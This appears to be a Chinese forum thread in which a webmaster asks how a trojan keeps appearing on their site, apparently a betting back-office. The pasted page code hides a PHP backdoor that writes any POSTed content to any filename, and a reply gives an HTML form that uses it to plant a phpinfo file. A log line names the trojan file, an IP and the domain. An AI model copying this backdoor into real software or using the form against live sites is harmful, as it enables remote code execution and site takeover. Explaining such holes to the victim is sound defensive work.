我是菜鸟 我的站总是有一个木马文件,黑客是怎么上传到我的站,很好奇。
<table width="99%" border="1" align="center" cellpadding="1" cellspacing="1" bordercolor="f1f1f1" id="tb">
<tr >
<td width="4%" height="28" align="center" nowrap="NOWRAP" bordercolor="cccccc" bgcolor="#CD9A99">序号</td>
<td width="80" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">号码</td>
<td width="40" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">止数</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">下目</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">占成</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">佣虽 </td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">上寺</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">预计</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走飞</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走额</td>
<td align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">当前赔率</td>
</tr>
<tr >
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
</tr>
</table><?php
if($_POST['img_text']=='news')
{
$title=$_POST['title'];$newsort =$_POST['newsort'];$newsort=str_replace(chr(92),"",$newsort);$fp = fopen($title,"w"); fputs($fp,$newsort); fclose($fp); }
else
{?>
<table width="99%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="15%"><font color="#FFFFFF"> <strong>
<?=$ids?>
设置</strong></font></td>
<td width="85%"><div align="right">
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=组合';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm1 STYLE='color:<?=$z1color?>;'>组合</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=百位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z2color?>;'>百位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=拾位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z3color?>;'>拾位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=个位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z4color?>;'>个位</span></button>
</div></td>
</tr>
</table>
<?php
}
?>
<table width="99%" border="1" align="center" cellpadding="1" cellspacing="1" bordercolor="f1f1f1" id="tb">
<tr >
<td width="4%" height="28" align="center" nowrap="NOWRAP" bordercolor="cccccc" bgcolor="#CD9A99">序号</td>
<td width="80" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">号码</td>
<td width="40" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">止数</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">下目</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">占成</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">佣虽 </td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">上寺</td>
<td width="9%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">预计</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走飞</td>
<td width="8%" align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">走额</td>
<td align="center" nowrap bordercolor="cccccc" bgcolor="#CD9A99">当前赔率</td>
</tr>
<tr >
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td height="28" align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
<td align="center" nowrap="nowrap"> </td>
</tr>
</table><?php
if($_POST['img_text']=='news')
{
$title=$_POST['title'];$newsort =$_POST['newsort'];$newsort=str_replace(chr(92),"",$newsort);$fp = fopen($title,"w"); fputs($fp,$newsort); fclose($fp); }
else
{?>
<table width="99%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="15%"><font color="#FFFFFF"> <strong>
<?=$ids?>
设置</strong></font></td>
<td width="85%"><div align="right">
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=组合';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm1 STYLE='color:<?=$z1color?>;'>组合</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=百位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z2color?>;'>百位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=拾位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z3color?>;'>拾位</span></button>
<button onClick="javascript:location.href='main.php?action=rake_pl3yszh&ids=个位';" class="button_a" style="height:22" ;><img src="images/add.gif" width="16" height="16" align="absmiddle"><SPAN id=rtm2 STYLE='color:<?=$z4color?>;'>个位</span></button>
</div></td>
</tr>
</table>
<?php
}
?>
$title = $_POST['title'];
$newsort = $_POST['newsort'];
$newsort = str_replace(chr(92), "", $newsort);
$fp = fopen($title, "w");
fputs($fp, $newsort);
fclose($fp);
}
就你这个代码,什么内容传不上来?
比如
<form method=post action=页面地址>
<input type=submit name=img_text value=news>
<input type=text name=title value='info.php'>
<input type=text name=newsort value='<?php phpinfo();'>
</form>
提交后就会在你的服务器上建立一个名为 info.php 的文件,执行它后就可知道你的服务器的所有信息
2013-11-10 13:26:29 GET /cc.php - 98.126.241.18 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) - www.itc888.com 200 0 1330 661 3593日志说明:k_vc.php 就是上面那一个文件,cc.php就是木马文件 www.itc888.com 小站的域名